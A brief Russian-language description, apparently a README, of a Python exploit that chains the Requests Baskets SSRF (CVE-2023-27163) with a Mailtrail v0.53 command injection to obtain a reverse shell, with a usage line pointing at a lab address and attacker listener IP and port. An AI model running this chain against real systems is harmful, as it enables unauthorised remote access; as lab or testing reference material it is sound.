
Python-эксплойт, объединяющий SSRF CVE-2023-27163 в Requests Baskets с Mailtrail v0.53 для перенаправления внутренних сервисов и выполнения обратной оболочки.
Следующий эксплойт использует уязвимость SSRF в Requests Baskets v1.2.1 для перенаправления внутреннего приложения, работающего на 127.0.0.1:80, на внешнее приложение по пути /pwned. После перенаправления приложения Mailtrail v0.53 будет выполнена команда обратной оболочки, и в течение нескольких секунд пользователь должен получить обратную оболочку на машине.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT